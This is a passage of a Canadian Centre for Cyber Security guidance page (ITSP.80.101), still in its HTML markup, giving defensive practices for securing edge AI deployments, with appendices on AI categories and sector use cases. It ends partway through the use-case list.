Canadian Centre for Cyber Security News.
The latest Cyber Security news releases, announcements, statements, and speaking notes from the Canadian Cyber Centre.
- Securely deploying AI at the network edge – ITSP.80.101by Canadian Centre for Cyber Security on July 15, 2026 at 6:56 pm
<article data-history-node-id="7979" about="/en/guidance/securely-deploying-ai-network-edge-itsp80101" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.80.101</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026Ā |Ā Practitioner series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <section><h2>Effective date</h2> <p>This publication takes effect on July 15, 2026.</p> <p>This is an <span class="text-uppercase">UNCLASSIFIED</span> publication that has been issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre).</p> <p>For more information, contact the Cyber Centre:</p> <ul><li>by email: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li>by phone: <a href="tel:+16139497048">613-949-7048</a> or <a href="tel:+18332923788">1ā833āCYBERā88</a></li> </ul></section><section><h2>Revision history</h2> <ol class="list-unstyled"><li><strong>First release:</strong> July 15, 2026.</li> </ol></section></div> </div> <div class="clearfix">Ā </div> <section><p>This publication sets out practical cyber security priorities for organizations that develop, deploy or operate artificial intelligence (AI) systems at the network edge. It is intended for practitioners, such as information technology (IT) and operational technology (OT) security managers, administrators and analysts, who are responsible for securing edge <abbr title="artificial intelligence">AI</abbr> deployments. Appendix A introduces core edge <abbr title="artificial intelligence">AI</abbr> categories and Appendix B provides representative use cases across sectors.</p> <p>This publication is designed to complement and extend the Canadian Centre for Cyber Securityās (Cyber Centre) foundational <abbr title="artificial intelligence">AI</abbr> security guidance <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">Top 10 artificial intelligence security actions: A primer (ITSAP.10.049),</a> which addresses <abbr title="artificial intelligence">AI</abbr> security for general organizational contexts. This publication is organized into the same three security pillars that underpin <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>:</p> <ul><li><strong>Pillar 1: </strong>Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></li> <li><strong>Pillar 2: </strong>Protecting <abbr title="artificial intelligence">AI</abbr> systems</li> <li><strong>Pillar 3: </strong>Protecting users and business processes</li> </ul><p>We expect these pillars to remain foundational as <abbr title="artificial intelligence">AI</abbr> technologies and threats evolve. Rather than referencing specific action numbers from <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>, which may periodically be revised, this publication aligns conceptually with those pillars, pointing readers to the relevant thematic areas where appropriate.</p> </section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#1">Edge <abbr title="artificial intelligence">AI</abbr></a></li> <li><a href="#2">Cyber security guidelines for edge <abbr title="artificial intelligence">AI</abbr></a> <ul><li><a href="#2.1">Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></a></li> <li><a href="#2.2">Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</a></li> <li><a href="#2.3">Pillar 3: Protecting users and business processes</a></li> </ul></li> <li><a href="#3">The ā1 deviceā exercise ā Applying this guidance</a></li> <li><a href="#4">Summary</a></li> <li><a href="#5">Learn more</a></li> <li><a href="#AA">Appendix A: Key edge <abbr title="artificial intelligence">AI</abbr> categories</a></li> <li><a href="#AB">Appendix B: Edge <abbr title="artificial intelligence">AI</abbr> use cases (user and operator categories)</a></li> </ul></details></section><section><h2 id="1">Edge <abbr title="artificial intelligence">AI</abbr> Ā </h2> <p>Edge <abbr title="artificial intelligence">AI</abbr> refers to <abbr title="artificial intelligence">AI</abbr> that performs inference and decision-making on or near the device where data is generated, such as:</p> <ul><li>smartphones with on-device assistants</li> <li>industrial gateways and controllers</li> <li>autonomous vehicles and drones</li> <li>smart sensors</li> <li>medical diagnostic devices</li> </ul><p>AI models are usually trained centrally, in the cloud or on premises, and then deployed to the network edge.</p> <p>In practice, edge <abbr title="artificial intelligence">AI</abbr> is often hybrid. Devices process data locally but rely on the cloud for model updates, orchestration, telemetry or fallback support. Edge <abbr title="artificial intelligence">AI</abbr> is defined more by local inference and decision-making than by total independence from the cloud. Organizations adopt edge <abbr title="artificial intelligence">AI</abbr> because of its low latency, reduced bandwidth use, and stronger data residency. It is also resilient in the event of connectivity loss and offers mission-critical autonomy as well as potentially lower costs. However, privacy is not guaranteed with edge <abbr title="artificial intelligence">AI</abbr>, and the total cost of ownership can include the cost of shifting to device hardware, energy, and fleet lifecycle management.</p> <p>Edge <abbr title="artificial intelligence">AI</abbr> creates distinct security and safety challenges, which may include:</p> <ul><li>local processing can expose models and data to attackers</li> <li>offline operation can delay patching and oversight</li> <li>data may be less private</li> <li>autonomous systems may act faster than humans can intervene</li> </ul><p>These combined challenges can produce a materially different risk profile from cloud <abbr title="artificial intelligence">AI</abbr>, especially where devices operate in untrusted environments or controlled physical systems.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="2">Cyber security guidelines for edge <abbr title="artificial intelligence">AI</abbr></h2> <p>The guidelines below represent a practical baseline for organizations deploying edge <abbr title="artificial intelligence">AI</abbr>. Organizations may require additional technical, procedural and assurance controls, especially for sensitive or mission-critical systems. You should apply supplementary controls wherever the consequences of compromise, malfunction or misuse are severe.</p> <p>These guidelines are organized into pillars, consistent with <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>:</p> <ul><li><strong>Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></strong> addresses how adversaries can exploit <abbr title="artificial intelligence">AI</abbr> systems and how organizations can use detection and monitoring to respond</li> <li><strong>Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</strong> focuses on securing models, software pipelines, devices, identities and supply chains</li> <li><strong>Pillar 3: Protecting users and business processes</strong> addresses safety, privacy, resilience and human oversight</li> </ul><h3 id="2.1">Pillar 1: Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></h3> <p>This pillar addresses the reality that adversaries can use <abbr title="artificial intelligence">AI</abbr> to conduct faster, more adaptive and more frequent attacks. Edge <abbr title="artificial intelligence">AI</abbr> devices are especially exposed because they often operate in public or uncontrolled environments and may be difficult to patch or supervise continuously. Organizations should emphasize rapid detection, behavioural monitoring and adaptive protection at the device and fleet level.</p> <h4>Behaviour-based detection and protection of edge devices</h4> <p><strong>Objective:</strong> Detect and disrupt abnormal or malicious behaviour affecting edge devices, including attacks that adapt over time or use <abbr title="artificial intelligence">AI</abbr> to evade static controls.</p> <p>Deploy security controls that can identify suspicious behaviour rather than relying only on fixed signatures or static rules. Monitor device processes, network activity, command sequences, sensor outputs and usage patterns for signs of deviation from normal operation. Where feasible, use device- or fleet-level baselines so unusual behaviour can be flagged quickly even when a specific attack is not yet known.</p> <p>Prioritize protections that can respond dynamically, such as policy-based isolation, automated containment, rate limiting or failsafe mode activation when defined thresholds are exceeded. In environments with intermittent connectivity, ensure local protections can still function when cloud-based security services are unavailable. Review detections regularly to refine thresholds, reduce noise and adapt to changing device roles and operating conditions.</p> <p>Small and medium-sized organizations should:</p> <ul><li>enable built-in endpoint detection and response (EDR) or antivirus (for example, Microsoft 365 Defender)</li> <li>use simple network anomaly tools or a firewallās intrusion prevention system to flag unusual device traffic</li> <li>start with basic rules (like new outbound connections and central processing unit (CPU) spikes) and auto-quarantine when these are triggered.</li> </ul><p><abbr title="information technology">IT</abbr> security practitioners should:</p> <ul><li>build per-device-class baselines in your security information and event management (SIEM)</li> <li>deploy <abbr title="endpoint detection and response">EDR</abbr> where supported</li> <li>use <abbr title="operational technology">OT</abbr> and Internet of Things (IoT) network intrusion detection for industrial equipment</li> <li>write detection rules for output distribution shifts, unusual protocol uses and sudden inference-rate changes</li> </ul><h4>Continuous monitoring and anomaly detection</h4> <p><strong>Objective:</strong> Gain visibility into edge <abbr title="artificial intelligence">AI</abbr> behaviour and detect security or safety issues early.</p> <p>Deploy monitoring capabilities on edge devices to capture both traditional security telemetry and <abbr title="artificial intelligence">AI</abbr>-specific signals. At a minimum, collect authentication events, resource usage, connectivity anomalies and errors. You should also collect model-related metrics such as inference counts, confidence levels, latency, decision logs or autonomous actions taken. Ensure the data can be transmitted securely, including store-and-forward mechanisms for intermittent connectivity.</p> <p>Define alert thresholds so serious events, such as failed integrity checks or dangerous deviations in behaviour, trigger immediate action. Lower-grade anomalies can then be reviewed without creating alert fatigue. Monitor for performance shifts, drift, unusual outputs or changing input patterns that may indicate sensor faults, adversarial interference or model degradation. Prepare <abbr title="artificial intelligence">AI</abbr>-specific incident response playbooks so responsible teams know how to isolate, investigate and safely recover affected systems.</p> <p>Small and medium-sized organizations should:</p> <ul><li>use a managed <abbr title="security information and event management">SIEM</abbr> or built-in cloud monitoring (such as Microsoft 365 Defender, Azure Sentinel or Elastic Cloud)</li> <li>collect system logs, application logs and basic health metrics</li> <li>set alerts for version or digital fingerprint (hash) changes as well as error spikes</li> </ul><p><abbr title="information technology">IT</abbr> security practitioners should:</p> <ul><li>define a telemetry schema (device posture, firmware and model hashes, attestation results, sensor health and inference statistics)</li> <li>sign and buffer logs and push to a <abbr title="security information and event management">SIEM</abbr></li> <li>build dashboards and anomaly rules for drift, tampering, and connectivity gaps</li> </ul><h3 id="2.2">Pillar 2: Protecting <abbr title="artificial intelligence">AI</abbr> systems</h3> <p>This pillar focuses on securing the <abbr title="artificial intelligence">AI</abbr> components, devices, software and supporting infrastructure that make edge <abbr title="artificial intelligence">AI</abbr> possible. Because <abbr title="artificial intelligence">AI</abbr> is often embedded in distributed devices, organizations need strong visibility, supply chain controls, integrity protections and identity governance to prevent compromise.</p> <h4>Identify and classify your edge <abbr title="artificial intelligence">AI</abbr> assets</h4> <p><strong>Objective:</strong> Know what edge <abbr title="artificial intelligence">AI</abbr> systems you have, where they run and the impact if they fail or are compromised.</p> <p>Conduct a comprehensive discovery exercise to identify all edge systems using any form of <abbr title="artificial intelligence">AI</abbr>, including rule-based automation, machine learning (ML), computer vision, sensor fusion or embedded <abbr title="artificial intelligence">AI</abbr> features, that may not be immediately apparent. For each edge system, document what it does, what could happen if it fails, whether it affects physical processes and whether fallback or manual control exists.</p> <p>Classify systems into clear risk tiers (safety-critical, business-critical or operational) so you can prioritize security efforts. Record architectural details and dependencies, including whether systems are fully local, hybrid edge-cloud, gateway-based or federated. Maintain this as a living inventory and connect it to change management so new <abbr title="artificial intelligence">AI</abbr> capabilities trigger review. This foundational step underpins every other security measure in this guidance.</p> <h4>Secure your <abbr title="artificial intelligence">AI</abbr> supply chain and maintain a dynamic bill of materials</h4> <p><strong>Objective:</strong> Know the origin and integrity of every component in your edge <abbr title="artificial intelligence">AI</abbr> stack and be ready to replace or update them quickly.</p> <p>Expand your inventory to include:</p> <ul><li>hardware</li> <li>firmware</li> <li>operating systems</li> <li><abbr title="artificial intelligence">AI</abbr> models</li> <li>libraries</li> <li>dependencies</li> <li>plug-ins</li> <li>datasets</li> <li>configuration files</li> </ul><p>Generate and maintain software bills of materials (SBOMs) and, where possible, model bills of materials (MBOMs) that capture provenance and versioning for <abbr title="artificial intelligence">AI</abbr> components. Update <abbr title="software bills of materials">SBOMs</abbr> and <abbr title="model bills of materials">MBOMs</abbr> whenever systems change.</p> <p>Vet third-party software, frameworks and pre-trained models before deploying them. This includes conducting vulnerability checks, supplier reviews and integrity validation through hashes or signatures. Monitor component vulnerabilities continuously and be prepared to patch, replace, disable or quarantine affected elements rapidly. Enforce that only approved and signed software and models can run on edge devices.</p> <h4>Govern non-human identities</h4> <p><strong>Objective:</strong> Manage credentials and identities used by <abbr title="artificial intelligence">AI</abbr> systems with the same rigour applied to human users.</p> <p>Audit all <abbr title="artificial intelligence">AI</abbr> agents, service accounts, bots, scripts and automated processes to determine how they authenticate and what they can access. Eliminate risky patterns such as shared human accounts, static credentials embedded in code or firmware and orphaned machine accounts that remain active after decommissioning.</p> <p>Assign every <abbr title="artificial intelligence">AI</abbr> system a unique identity, issue short-lived credentials where possible and automate rotation and revocation. Apply least privilege so <abbr title="artificial intelligence">AI</abbr> agents can access only the systems, data or commands they genuinely require. In higher-assurance environments, tie identity issuance to device or workload attestation so credentials are granted only when the system is in a trusted state.</p> <h4>Secure model disposal and apply cryptographic erasure</h4> <p><strong>Objective:</strong> Ensure retired edge <abbr title="artificial intelligence">AI</abbr> devices and models cannot be mined for data, credentials or intellectual property.</p> <p>Establish a formal decommissioning process for edge <abbr title="artificial intelligence">AI</abbr> devices that includes secure wiping, verification, documentation and credential revocation. Where supported, use hardware-based cryptographic erasure by destroying or invalidating encryption keys so stored data and models become unreadable. In highly sensitive cases, physically destroy storage media.</p> <p>Require secure storage and disposal capabilities during procurement so future devices support encryption and reliable key destruction. Also account for lost or stolen devices by enabling rapid remote wipe and immediate revocation of access. This extends security across the full lifecycle of the asset.</p> <h4>Harden <abbr title="artificial intelligence">AI</abbr> models, agents and control logic against theft and tampering</h4> <p><strong>Objective:</strong> Protect <abbr title="artificial intelligence">AI</abbr> models and related control components on edge devices from theft, tampering and manipulation.</p> <p>Use hardware-supported protections such as Secure Boot, full-disk encryption and trusted execution environments where available. Treat models, policies, configuration files and agent logic as critical software by signing them digitally and verifying signatures before loading. Where feasible, bind model or configuration encryption to individual devices so copied files cannot be reused elsewhere.</p> <p>Continuously verify integrity and monitor for unusual performance changes that may indicate tampering, unauthorized modification or adversarial manipulation. Protect rules, prompts, configuration files and models from unauthorized change through logging, write protection, checksums or digital signatures. Regularly test scenarios such as spoofed sensor data, malicious configuration changes or deceptive inputs to confirm that safeguards, fail-safes and alerts work as intended.</p> <h3 id="2.3">Pillar 3: Protecting users and business processes</h3> <p>This pillar addresses privacy, safety, reliability and governance. It recognizes that <abbr title="artificial intelligence">AI</abbr> can fail through drift, error, misuse or over-automation even when no malicious attack is involved. It emphasizes resilient processes and human control.</p> <h4>Implement data privacy and on-device processing controls</h4> <p><strong>Objective:</strong> Reduce unnecessary exposure of sensitive data and maintain control over how personal or sensitive information is processed.</p> <p>Map the dataflows of each edge <abbr title="artificial intelligence">AI</abbr> system, including:</p> <ul><li>what data is collected</li> <li>where data is stored</li> <li>whether personal or sensitive information is involved</li> <li>whether personal or sensitive information is transmitted to external servers or vendor platforms</li> </ul><p>Many devices ship with default cloud services enabled, so hidden data transfers must be identified and assessed.</p> <p>Prioritize local or on-premises processing for sensitive data using compact models or small language models where feasible. When external processing is required, route data only to approved environments that meet privacy, security and jurisdictional requirements. Monitor outbound traffic for unexpected destinations, encrypt data in transit and minimize exposure through anonymization, aggregation or data minimization where possible.</p> <h4>Secure the operational and information technology boundary and implement fail-safes</h4> <p><strong>Objective:</strong> Ensure that when <abbr title="artificial intelligence">AI</abbr> is integrated with <abbr title="operational technology">OT</abbr>, safety and reliability do not depend solely on <abbr title="artificial intelligence">AI</abbr>.</p> <p>Identify every point where edge <abbr title="artificial intelligence">AI</abbr> interacts with physical equipment or industrial control processes. For each interaction point, determine the worst-case outcome if the <abbr title="artificial intelligence">AI</abbr> fails or behaves unexpectedly, and confirm whether a safe fallback exists that does not rely on the <abbr title="artificial intelligence">AI</abbr> itself. Where gaps exist, add independent hardware or low-level safety controls such as emergency stops, spring-return valves or other default-safe mechanisms.</p> <p>Test <abbr title="artificial intelligence">AI</abbr> behaviour in simulated or controlled environments before live deployment, including under abnormal or adversarial conditions. Segment networks between <abbr title="artificial intelligence">AI</abbr> and <abbr title="operational technology">OT</abbr> systems, tightly limit communications and monitor for unauthorized or anomalous commands. Apply restraint and use <abbr title="artificial intelligence">AI</abbr> in <abbr title="operational technology">OT</abbr> only where it provides clear value that justifies the added complexity and risk.</p> <h4>Maintain human oversight and mechanical fail-safes</h4> <p><strong>Objective:</strong> Ensure humans can intervene, override or shut down autonomous edge <abbr title="artificial intelligence">AI</abbr> systems when necessary.</p> <p>Implement accessible kill switches, override controls or independent shutdown mechanisms for every autonomous or safety-relevant edge <abbr title="artificial intelligence">AI</abbr> system. These controls should not rely on the <abbr title="artificial intelligence">AI</abbr>ās cooperation and should be tested regularly. Define where human approval is required before <abbr title="artificial intelligence">AI</abbr>-initiated actions occur, especially for high-impact decisions.</p> <p>Train operators to understand <abbr title="artificial intelligence">AI</abbr> capabilities and limitations, including how to detect unreliable output, interpret alerts and assume manual control. Manage degrees of autonomy deliberately, assigning each system the appropriate level of independence for its risk profile. Maintain tamper-resistant logs of <abbr title="artificial intelligence">AI</abbr> actions and human interventions so incidents and near-misses can be reviewed and used to improve both technology and process.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="3">The ā1 deviceā exerciseĀ ā Applying this guidance</h2> <p>After reviewing these guidelines, apply them to one real edge <abbr title="artificial intelligence">AI</abbr> device in your environment. Choose a representative or high-impact system and answer the following four questions:</p> <ol><li>What decisions does the device make autonomously?</li> <li>What inputs influence those decisions?</li> <li>What happens if the device fails or is compromised?</li> <li>What fallback exists if the <abbr title="artificial intelligence">AI</abbr> stops working or can no longer be trusted?</li> </ol><p>Document the findings and use them to prioritize action. If you discover weak or unvalidated inputs, strengthen detection, integrity controls and monitoring. If consequences are severe and fallback is weak, prioritize safety mechanisms, segmentation and human override. For sensitive, safety-critical or mission-critical systems, use this exercise to identify additional controls beyond those outlined in this publication to close residual gaps.</p> </section><section><h2 id="4">Summary</h2> <p>Edge <abbr title="artificial intelligence">AI</abbr> offers significant operational benefits, but it also places more responsibility on the deploying organization for security, safety and resilience. By applying these edge <abbr title="artificial intelligence">AI</abbr> cyber security guidelines, organizations can better defend against <abbr title="artificial intelligence">AI</abbr>-enabled threats, secure their <abbr title="artificial intelligence">AI</abbr> systems and supply chains, as well as preserve privacy, human oversight and operational continuity.</p> <p>Under Pillar 1, organizations should improve visibility, dynamic detection and anomaly response to keep pace with increasingly adaptive attacks. Under Pillar 2, they should manage <abbr title="artificial intelligence">AI</abbr> devices, models, components, identities and control logic as critical assets. Under Pillar 3, they should ensure that <abbr title="artificial intelligence">AI</abbr> adoption does not erode privacy, safety, trust or human control. When implemented together, these guidelines can help organizations take a principled and adaptable approach to securing edge <abbr title="artificial intelligence">AI</abbr> as technologies and threats continue to evolve.</p> </section><section><h2 id="5">Learn more</h2> <ul><li><a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">Top 10 artificial intelligence security actions: A primer (ITSAP.10.049)</a></li> <li><a href="/en/guidance/security-considerations-edge-devices-itsm80101">Security considerations for edge devices (ITSM.80.101)</a></li> <li><a href="/en/guidance/firewall-security-considerations-itsap80039">Firewall security considerations (ITSAP.80.039)</a></li> <li><a href="/en/guidance/routers-cyber-security-best-practices-itsap80019">Router cyber security best practices (ITSAP.80.019)</a></li> <li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Network security logging and monitoring (ITSAP.80.085)</a></li> <li><a href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li>Cybersecurity and Infrastructure Agency (CISA) <a href="https://www.cisa.gov/resources-tools/resources/principles-secure-integration-artificial-intelligence-operational-technology">Principles for the Secure Integration of Artificial Intelligence in Operational Technology</a></li> <li>Open Worldwide Application Security Project (OWASP) <a href="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/">Top 10 for Agentic Applications 2026</a></li> <li>United Kingdomās National Cyber Security Centre (NCSC) <a href="https://www.ncsc.gov.uk/files/Guidelines-for-secure-AI-system-development.pdf">Guidelines for secure <abbr title="artificial intelligence">AI</abbr> system development (PDF)</a></li> <li>Cloud Security Alliance (CSA) <a href="https://cloudsecurityalliance.org/artifacts/securing-autonomous-ai-agents/">Securing Autonomous <abbr title="artificial intelligence">AI</abbr> Agents</a></li> <li>United Kingdomās <a href="https://www.gov.uk/government/publications/ai-cyber-security-code-of-practice">AI Cyber Security Code of Practice</a></li> <li>United Statesā National Institute of Standards and Technology (NIST) <a href="https://www.nist.gov/itl/ai-risk-management-framework">AI Risk Management Framework (AI RMF)</a></li> <li>International Organization for Standardization / International Electrotechnical Commission (ISO/IEC) <a href="https://www.iso.org/standard/42001">Standard 42001: Information technologyĀ ā Artificial intelligenceĀ ā Management system</a></li> </ul></section><!–** TOP OF PAGE ******–><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="AA">Appendix A: Key edge <abbr title="artificial intelligence">AI</abbr> categories</h2> <p>The spectrum of <abbr title="artificial intelligence">AI</abbr> technologies commonly deployed at the network edge can be vast.</p> <p>To effectively secure edge <abbr title="artificial intelligence">AI</abbr>, it is important to recognize the different types, or categories, of <abbr title="artificial intelligence">AI</abbr> and <abbr title="machine learning">ML</abbr> techniques that may be running on your devices, since each has distinct vulnerabilities. Below is a summary of eight major <abbr title="artificial intelligence">AI</abbr> categories found in edge deployments. These categories are not mutually exclusive; an edge device may use multiple <abbr title="artificial intelligence">AI</abbr> types simultaneously.</p> <ul><li><strong>Category AĀ ā Rule-based systems:</strong> <ul><li>Description: these use human-defined if/then rules or logic (for example, simple expert systems, safety interlocks)</li> <li>Vulnerability: attackers may tamper with the rules or thresholds themselves. Even without <abbr title="machine learning">ML</abbr>, manipulated rules can cause harmful outcomes if thresholds are altered (for example, changing a safety-alarm trigger from 150 pounds per square inch (PSI) to 500 PSI)</li> </ul></li> <li><strong>Category BĀ ā Search, planning and optimization:</strong> <ul><li>Description: algorithms that systematically explore possible solutions or paths (for example, route planning or scheduling)</li> <li>Vulnerability: input manipulation can mislead the planning process. For example, feeding incorrect map data to a pathfinding <abbr title="artificial intelligence">AI</abbr> could send a robot or vehicle along an unsafe route</li> </ul></li> <li><strong>Category CĀ ā Probabilistic reasoning:</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> that fuses data from multiple uncertain sources (for example, Bayesian or Kalman filters)</li> <li>Vulnerability: subtle biasing of inputs can gradually skew estimates without triggering obvious alarms</li> </ul></li> <li><strong>Category DĀ ā Classic <abbr title="machine learning">ML</abbr>:</strong> <ul><li>Description: traditional <abbr title="machine learning">ML</abbr> models (for example, decision trees, random forests or support vector machines)</li> <li>Vulnerability: model files and data pipelines must be treated as critical software assets; an attacker might steal or alter an <abbr title="machine learning">ML</abbr> model on a device or manipulate how it processes data</li> </ul></li> <li><strong>Category EĀ ā Computer vision pipelines:</strong> <ul><li>Description: systems that interpret images or video</li> <li>Vulnerability: physical adversarial attacks, such as placing patterns in a cameraās view, can mislead the vision system without any digital compromise of the device</li> </ul></li> <li><strong>Category FĀ ā Deep learning (non-generative):</strong> <ul><li>Description: deep neural networks used for prediction, classification or detection (for example, voice recognition, advanced driver-assistance systems)</li> <li>Vulnerability: susceptible to adversarial examples and exploitation of software or hardware vulnerabilities in the <abbr title="machine learning">ML</abbr> framework</li> </ul></li> <li><strong>Category GĀ ā Generative <abbr title="artificial intelligence">AI</abbr> and small language models (SLMs):</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> that creates new content or interprets complex commands, which is now feasible on the edge with <abbr title="small language models">SLMs</abbr></li> <li>Vulnerability: introduces unique threats such as prompt injection and output manipulation. In addition, malicious inputs could subvert instructions or cause generated outputs to trigger harmful downstream actions</li> </ul></li> <li><strong>Category HĀ ā Reinforcement learning and autonomy (agentic systems):</strong> <ul><li>Description: <abbr title="artificial intelligence">AI</abbr> agents that perceive, decide and act in a loop (for example, robotics, drones or autonomous vehicles)</li> <li>Vulnerability: faces the broadest range of risks, combining physical tampering, adversarial inputs and model compromise with direct and immediate real-world consequences</li> </ul></li> </ul></section><!–** TOP OF PAGE ******–><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 id="AB">Appendix B: Edge <abbr title="artificial intelligence">AI</abbr> use cases (user and operator categories)</h2> <p>The following are representative categories of organizations or contexts that deploy edge <abbr title="artificial intelligence">AI</abbr>, with example use cases:</p> <ul><li><strong>Category 1Ā ā Critical infrastructure operators:</strong> <ul><li>Description: large-scale essential services and utilities</li> <li>Examples: power grids, telecommunications networks, energy pipelines, nuclear facilities, transportation systems, as well as banking and financial transaction networks</li> <li>Mapping example: A power grid operator (Category 1) using <abbr title="artificial intelligence">AI</abbr> to predict equipment failures and optimize load distribution (Category C ā Probabilistic reasoning) will therefore prioritize continuous anomaly monitoring, supply chain integrity of <abbr title="artificial intelligence">AI</abbr> sensors, and robust failsafes to prevent cascading outages</li> </ul></li> <li><strong>Category 2Ā ā Healthcare and medical devices:</strong> <ul><li>Description: health sector entities deploying <abbr title="artificial intelligence">AI</abbr> at points of care</li> <li>Examples: hospitals using diagnostic <abbr title="artificial intelligence">AI</abbr> devices, medical device manufacturers with smart monitoring implants, and health agencies using <abbr title="artificial intelligence">AI</abbr> for bedside patient data analysis</li> <li>Mapping example: A healthcare operator (Category 2) using <abbr title="artificial intelligence">AI</abbr> to help diagnose X-ray images (Category EĀ ā Computer vision pipelines) will therefore prioritize data sovereignty and model monitoring for patient safety, as well as adversarial input controls to prevent misdiagnosis from manipulated imaging data</li> </ul></li> <li><strong>Category 3Ā ā Industrial and manufacturing (industrial IoT):</strong> <ul><li>Description: industrial companies using <abbr title="artificial intelligence">AI</abbr> in <abbr title="operational technology">OT</abbr> environments</li> <li>Examples: factories with <abbr title="artificial intelligence">AI</abbr>-driven predictive maintenance sensors, robotic assembly lines, <abbr title="artificial intelligence">AI</abbr>-based quality inspection systems, as well as industrial control systems with embedded <abbr title="machine learning">ML</abbr></li> <li>Mapping example: A manufacturer (Category 3) deploying <abbr title="artificial intelligence">AI</abbr>-driven robotic assembly controlled by reinforcement learning agents (Category HĀ ā Reinforcement learning and autonomy) will therefore prioritize physical failsafes, human override mechanisms and hardening of on-device models against tampering</li> </ul></li> <li><strong>Category 4Ā ā Smart cities and municipal services:</strong> <ul><li>Description: public sector and urban infrastructure operators</li> <li>Examples: city traffic control systems with <abbr title="artificial intelligence">AI</abbr>-timed lights, environmental monitoring sensors with local analytics, public safety surveillance cameras with <abbr title="artificial intelligence">AI</abbr>, and smart grid components in municipal utilities</li> <li>Mapping example: A municipal operator (Category 4) using <abbr title="artificial intelligence">AI</abbr> to optimize traffic light sequencing (Category B ā Search, planning and optimization) will therefore prioritize integrity verification of input data feeds, transparency in automated decision logic, and human override capabilities</li> </ul></li> <li><strong>Category 5Ā ā Consumer and small business:</strong> <ul><li>Description: individuals and small firms using consumer-grade or small-scale edge <abbr title="artificial intelligence">AI</abbr></li> <li>Examples: smart home devices (like security cameras, voice assistants or smart appliances), wearable health trackers, small business security systems, and smartphones with on-device <abbr title="artificial intelligence">AI</abbr> features</li> <li>Mapping example: A small business (Category 5) using an <abbr title="artificial intelligence">AI</abbr>-enabled smart security camera system (Category E ā Computer vision pipelines) will therefore prioritize vendor management for embedded <abbr title="artificial intelligence">AI</abbr> components, data sovereignty to limit unnecessary cloud transmission, and privacy controls for individuals captured on camera</li> </ul></li> <li><strong>Category 6Ā ā Automotive and transportation:</strong> <ul><li>Description: use of edge <abbr title="artificial intelligence">AI</abbr> in vehicles and transport systems</li> <li>Examples: autonomous and semi-autonomous cars, advanced driver-assistance systems, <abbr title="artificial intelligence">AI</abbr> in fleet management devices, delivery drones or unmanned aerial vehicles, and vehicle-to-everything communication systems</li> <li>Mapping example: An automotive manufacturer (Category 6) deploying deep learning for advanced driver-assistance systems (Category FĀ ā Deep learning (non-generative)) will therefore prioritize adversarial robustness of perception models, cryptographic protection of over-the-air model updates, and failsafe mechanisms that default control to the human driver</li> </ul></li> <li><strong>Category 7Ā ā Retail and physical security:</strong> <ul><li>Description: retail industry and security service providers leveraging edge <abbr title="artificial intelligence">AI</abbr></li> <li>Examples: <abbr title="artificial intelligence">AI</abbr>-powered closed-circuit television and video analytics, facial recognition access control, smart point-of-sale (POS) kiosks, and autonomous inventory management robots</li> <li>Mapping example: A retail operator (Category 7) using <abbr title="artificial intelligence">AI</abbr>-powered facial recognition for access control (Category EĀ ā Computer vision pipelines) will therefore prioritize data privacy compliance, secure model disposal to protect biometric data, and continuous monitoring for model drift or spoofing attempts</li> </ul></li> <li><strong>Category 8Ā ā Agriculture technology:</strong> <ul><li>Description: farming and agricultural businesses deploying <abbr title="artificial intelligence">AI</abbr> on equipment</li> 